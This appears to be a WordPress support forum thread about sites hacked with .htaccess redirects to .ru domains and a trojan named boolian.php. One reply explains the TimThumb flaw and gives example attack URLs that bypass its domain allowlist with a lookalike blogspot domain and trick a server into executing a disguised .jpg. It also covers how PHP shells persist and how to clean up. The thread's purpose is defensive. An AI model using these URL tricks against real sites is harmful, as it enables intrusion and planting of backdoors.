Important! : Wordpress users, who have had hacked shells and .htaccess files please read.

Hi all,

I have been going through a members website here, who's .htaccess file got hacked, most of the links were to .ru (russian) websites, I know people here lately have had this same issue.

Going through the website I found a boolian.php file, upon checking this file it was a trojan, then my sophos anti-virus went mad, after opening up but that wasn't a problem.

What I would like/need you to do, if you've also been infected is post the date you was infected, if you have a file called boolian.php, the themes you have and the plugins you use/have.

I would appreicate as much input as possible, please be as accurate as possible when posting, do not post personal information/passwords here.

Thank you all for your time.

Kind Regards
Jack (Coding-Monkey).

  • Jack Kitterhing
    • Code Norris

    Hi Timothy,

    Thanks, I just think it's all going to point to one thing, at the moment I have a few idea's, but I don't want to publicly put what I think, in case it isn't the case :slight_smile:

    Hopefully people will start posting soon, so we might be able to find the root of the problem.

    also while I'm posting, I thought of a few other things.

    When posting, please also put, your hosting company, your plan, i.e shared, VPS or dedicated. Also what Wordpress version you were using when you first got infected.

    Thanks! Take care everyone and keep your websites safe! :wink:

    Kind Regards
    Jack (Coding-Monkey).

  • Jason
    • The Incredible Code Injector

    I had one of these, however it's been well documented around the web, I'll reshare what I've found here.

    There are various exploits in some themes that use a ledgen-timthumb-dary opensource script to create thumbnails. It had rudimentary security that checked to make sure the domain was in an allowed list. The problem was that the list included several widely used public sources, and also used a string compairsion that could be fooled.

    Normally, thumbnailed images were linked by the theme like this:

    http://mywebsite.com/wp-content/themes/mytheme/timthumb.php?src=http://mywebsite.com/weird-cat-pic.jpg&size=400px

    What the script would then do is goto http://cool.blogspot.com/weird-cat-pic.jpg and save that remote image to your server, and then resize the image and provide a thumbnail.

    Bad people abused this by uploading a virus to their own website or other public website like blogger. They would create a fake blog with the same name as your domain. So if your website was http://mywebsite.com they would make a fake blog with the address http://mywebsite.com.blogspot.com and this would trick the thumbnail script into thinking it was your own website.The script would then download the virus to your server from a bad person requesting the bad link. It would look something like this:

    http://mywebsite.com/wp-content/themes/mytheme/timthumb.php?src=http://mywebsite.com.blogspot.com/not-really-a-pic-actually-a-trojan.jpg&size=400px

    Timthumb will obviously fail to resize the image, but the file is now on your server!
    not-really-a-pic-actually-a-trojan.jpg is now sitting in your public timthumb cache folder.

    Now the problem is that timthumb would only download files ending in .jpg or a few other image types, and servers only execute .php files right?

    This is where the NEXT flaw in servers is used. Then they call the link to that image but it's modified to trick the server into executing it.

    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?
    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?.php
    http://mywebsite.com/not-really-a-pic-actually-a-trojan.jpg?/../&test.php

    There are a few different things that they will try, once the script is executed, they begin creating backdoors for themselves. The original way they got in is usually left there and ignored.

    Then they copy the php remote shell to various folders. I've found them in theme folders, uploads folders, wp-admin and wp-includes with convincing sounding names.

    This ensures if you do find a few, they may have one stay under the radar.

    As well as leaving behind new files, they will also copy the php shell to footer.php of your theme or sidebar.php sometimes it's just a super long single line in the middle of the file. This makes your website very slow, but then, they don't really care about that anyway, do they?

    Best bet to erase everything and start with fresh known good copies.
    Scan your database for injections.
    Clean the uploads folder, methodically.
    re-download Wordpress fresh and re create your wp-config.php file. don't use the old one.

    Best practices are to keep your server updated, keep wordpress updated, avoid timthumb whenever, wherever possible.

    Also, erase all .htaccess files or nginx config files and make sure they are clean too.

    Extra security is to not allow php to execute in the uploads directory at all, or move it to a server without php at all.

    *Whew~* Ok I think that's my bit.

  • Jack Kitterhing
    • Code Norris

    Thanks @Jason for the info, I was aware of them particular vulnerabilities, nice to have all the info in one place :slight_smile:

    @ everyone else, please can you add if your theme uses TimThumb, thanks,

    Also sorry for the delay in my replys, I've been away the past few days.

    Thanks!

    Kind Regards
    Jack (Coding-Monkey),

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.